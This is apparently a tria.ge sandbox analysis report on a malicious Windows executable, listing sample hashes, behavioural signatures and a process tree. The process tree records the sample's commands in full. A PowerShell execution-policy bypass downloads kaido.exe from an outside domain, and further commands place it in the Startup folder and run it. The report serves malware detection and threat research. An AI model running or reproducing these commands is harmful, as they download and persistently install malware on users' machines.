Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1007fb7b42fe...35.exe
windows7-x64
107fb7b42fe...35.exe
windows10-2004-x64
84fa565cc2e...af.exe
windows7-x64
14fa565cc2e...af.exe
windows10-2004-x64
3949c262359...70.ps1
windows7-x64
3949c262359...70.ps1
windows10-2004-x64
3b3b66f7e70...62.exe
windows7-x64
10b3b66f7e70...62.exe
windows10-2004-x64
10Analysis
-
max time kernel
98s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26/12/2024, 17:54
Behavioral task
behavioral1
Sample
07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
4fa565cc2ebfe97b996786facdb454e4328a28792e27e80e8b46fe24b44781af.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
4fa565cc2ebfe97b996786facdb454e4328a28792e27e80e8b46fe24b44781af.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
949c262359f87c8a0e8747f28a89cf3d519b35fbc5a8be81b2cd9e6adc830370.ps1
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
949c262359f87c8a0e8747f28a89cf3d519b35fbc5a8be81b2cd9e6adc830370.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
b3b66f7e70f1e1b1494677d0ed79fcc7d4901ffae53d89fd023c8b789bb0fe62.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
b3b66f7e70f1e1b1494677d0ed79fcc7d4901ffae53d89fd023c8b789bb0fe62.exe
Resource
win10v2004-20241007-en
General
-
Target
07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe
-
Size
131KB
-
MD5
17eb8fa4b86a2f5ec5cb789545902181
-
SHA1
cb40cc63b23bc335aa095606c07b56f2d2d71bb9
-
SHA256
07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235
-
SHA512
cce3789d6e5395f701c9ff10467c3352568f7a3cea13cfd55e6b6f1bade8f01a56a8c1a433940fa1ccdce201941788717f6d486cef40f59d2bac075eaf696573
-
SSDEEP
1536:j/tSikO5ssRyJmapXRQVO6eWkYolZPt1AUvMFMQiNwRVRky3es:xSWqLQAYolZPt1oJRfky3es
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 3444 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3444 powershell.exe 3444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3444 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 5056 wrote to memory of 4840 5056 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 84 PID 5056 wrote to memory of 4840 5056 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 84 PID 4840 wrote to memory of 3444 4840 cmd.exe 85 PID 4840 wrote to memory of 3444 4840 cmd.exe 85 PID 5056 wrote to memory of 1092 5056 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 86 PID 5056 wrote to memory of 1092 5056 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 86 PID 5056 wrote to memory of 1552 5056 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 87 PID 5056 wrote to memory of 1552 5056 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 87 PID 5056 wrote to memory of 264 5056 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 88 PID 5056 wrote to memory of 264 5056 07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe"C:\Users\Admin\AppData\Local\Temp\07fb7b42fe8d4a2125df459efd86de0f27b91b59d82b85b530c1e7c552c9e235.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -nop -exec bypass wget -uri http://xxxs.info/kaido.exe -outfile x.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -exec bypass wget -uri http://xxxs.info/kaido.exe -outfile x.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c move x.exe "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/"2⤵PID:1092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:1552
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cd "%APPDATA%/Microsoft/Windows/Start Menu/Programs/Startup/" && x.exe2⤵PID:264
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82